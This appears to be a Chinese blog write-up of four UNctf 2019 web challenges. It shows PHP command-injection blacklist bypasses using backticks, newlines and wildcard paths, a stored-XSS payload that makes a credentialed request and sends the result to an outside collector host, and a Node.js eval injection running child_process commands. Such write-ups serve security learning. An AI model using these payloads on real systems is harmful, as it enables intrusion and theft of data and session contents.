<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="对未来的最大慷慨，就是把一切都献给现在。">
    <meta name="keyword" content>
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        UNctf 赛后回顾 - undefined
        
    </title>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/aircloud.css">
    <link rel="stylesheet" href="/css/gitment.css">
    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_pl6z7sid89qkt9.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
</head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i>  </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar ">
            <img src="/" />
        </div>
        <div class="name">
            <i>Luc1fer</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>HOME</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>TAGS</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>ARCHIVES</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>ABOUT</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>SEARCH</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#UNctf-赛后回顾"><span class="toc-text">UNctf 赛后回顾</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#bypass"><span class="toc-text">bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#one-way"><span class="toc-text">one way</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#another-way"><span class="toc-text">another way</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-xss"><span class="toc-text">easy xss</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#checkin"><span class="toc-text">checkin</span></a></li></ol></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">search</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i>  </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        UNctf 赛后回顾
    </div>

    <div class="post-meta">
        <span class="attr">Post：<span>2019-11-20 09:26:49</span></span>
        
        <span class="attr">Tags：/
        
        <a class="tag" href="/tags/#wp" title="wp">wp</a>
        <span>/</span>
        
        <a class="tag" href="/tags/#ctf" title="ctf">ctf</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">Visit：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content ">
        <h1 id="UNctf-赛后回顾"><a href="#UNctf-赛后回顾" class="headerlink" title="UNctf 赛后回顾"></a>UNctf 赛后回顾</h1><h2 id="bypass"><a href="#bypass" class="headerlink" title="bypass"></a>bypass</h2><p>题目源码：</p>
<pre><code>&lt;?php
    highlight_file(__FILE__);
    $a = $_GET[&apos;a&apos;];
    $b = $_GET[&apos;b&apos;];
 // try bypass it
    if (preg_match(&quot;/\&apos;|\&quot;|,|;|\\|\`|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|&lt;|\&amp;[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is&quot;, $a))
        $a = &quot;&quot;;
        $a =&apos;&quot;&apos; . $a . &apos;&quot;&apos;;
    if (preg_match(&quot;/\&apos;|\&quot;|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|&lt;|\&amp;[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is&quot;, $b))
        $b = &quot;&quot;;
        $b = &apos;&quot;&apos; . $b . &apos;&quot;&apos;;
     $cmd = &quot;file $a $b&quot;;
      str_replace(&quot; &quot;,&quot;&quot;,&quot;$cmd&quot;); 
     system($cmd);
?&gt;</code></pre><h3 id="one-way"><a href="#one-way" class="headerlink" title="one way"></a>one way</h3><p>正则黑名单匹配，对输入的参数强制加上双引号，即使我们绕过检测也会被加上双引号无法执行命令。这里用到了反引号 ```</p>
<p>观察第一个正则 `\|`` 三个反斜杠才能转义反斜杠，这里对 | 进行了转义从而造成反引号逃逸。</p>
<pre><code>&lt;?php
$a = &quot;`dir`&quot;;
if (preg_match(&quot;/\&apos;|\&quot;|,|;|\\|\`/is&quot;,$a))
    $a = &quot;&quot;;
    $a =&apos;&quot;&apos; . $a . &apos;&quot;&apos;;
    var_dump($a);

string(7) &quot;&quot;`dir`&quot;&quot;</code></pre><p>可以看到反引号成功逃逸。</p>
<p>我们到题目中尝试列目录，没有 <code>ls</code> 可以用 <code>dir</code></p>
<pre><code>?a=`dir%20/`

响应：

bin dev home lib64 mnt proc run srv sys usr boot etc lib media opt root sbin start.sh tmp var: cannot open `bin dev home lib64\011mnt proc run\011 srv\011 sys\011usr\012boot etc lib\011 media\011opt root sbin start.sh tmp\011var&apos; (No such file or directory) : cannot open `&apos; (No such file or directory) </code></pre><p>查找flag </p>
<pre><code>?a=`/b??/gr??%20-R%20unctf`

响应：
.F1jh_/h3R3_1S_your_F1A9.txt:unctf{86dfe85d7c5842c5c04adae104193ee1}: cannot open `.F1jh_/h3R3_1S_your_F1A9.txt:unctf{86dfe85d7c5842c5c04adae104193ee1}&apos; (No such file or directory) : cannot open `&apos; (No such file or directory) </code></pre><h2 id="another-way"><a href="#another-way" class="headerlink" title="another way"></a>another way</h2><p>第二个正则 <code>\\|\n</code> 会解释为竖线和换行，所以利用 <code>%0a</code> 进行换行绕过，同时末尾使用 <code>%20#</code> 来终止命令处理双引号</p>
<pre><code>?a=\&amp;b=%0a/???/gr?p%20-R%20ctf%20%23
效果是
file&quot;\&quot;&quot;
/???/gr?p -R ctf #&quot;</code></pre><h2 id="easy-xss"><a href="#easy-xss" class="headerlink" title="easy xss"></a>easy xss</h2><p>在留言板处提交 xss 发现能够触发，访问储存的路径发现一个接口</p>
<pre><code>http://112.74.37.15:8010/index.php/treehole/view?id=5dcd1d7bd11a4</code></pre><p>此时的请求头里带上了 <code>XMLHttpRequest</code> ，同时不带参数访问时得到 debug 页面，可以看到 XHR请求带上了 cookie ，于是我们构造 XHR 请求</p>
<pre><code>&lt;img src=&apos;/efefefe&apos; onerror=&quot;xmlhttp=new
XMLHttpRequest();xmlhttp.withCredentials=true;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){location.href=&apos;http://xssye.com/kOaI/?flag=&apos;
xmlhttp.responseText.match(&apos;flag\\{(.\*?)\\}&apos;)[1]}};xmlhttp.open(&apos;GET&apos;,&apos;/index.php/treehole/view?id=&apos;,true);xmlhttp.send(&apos;&apos;);&quot;/\&gt;</code></pre><h2 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h2><p>查看源码发现各个接口</p>
<pre><code>      switch (e.cmd) {
        case &apos;name&apos;:
          this.nickname = e.msg,
          this.kesshoubanMsg(`Change nickname ${this.nickname
        }
         success!`);
        break;
      case &apos;error&apos;:
        this.kesshoubanMsg(`🙁${e.msg
    }
    `);
    break;
  case &apos;calc&apos;:
    this.kesshoubanMsg(`${e.msg
  }
  `);
  break;
case &apos;flag&apos;:
  this.kesshoubanMsg(`${e.msg
}
`);</code></pre><p>修改完名字后测试 <code>/calc 1+1</code> 发现成功执行，存在代码注入参考<a href="http://qnkcdz0.xyz/2019/06/24/Node-js%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Beval%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">http://qnkcdz0.xyz/2019/06/24/Node-js%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Beval%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/</a></p>
<p>尝试 <code>/calc require(&#39;child_process&#39;).execSync(&#39;cat$IFS/flag&#39;).toString();</code> 其中空格过滤绕过 $IFS ，同时Sync采用非阻塞返回。</p>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>

        <div id="lv-container">
        </div>

    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a href="https://hexo.io/">Hexo</a>  Theme <a href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "./public/search.xml"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
<script src="/js/index.js"></script>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




</html>
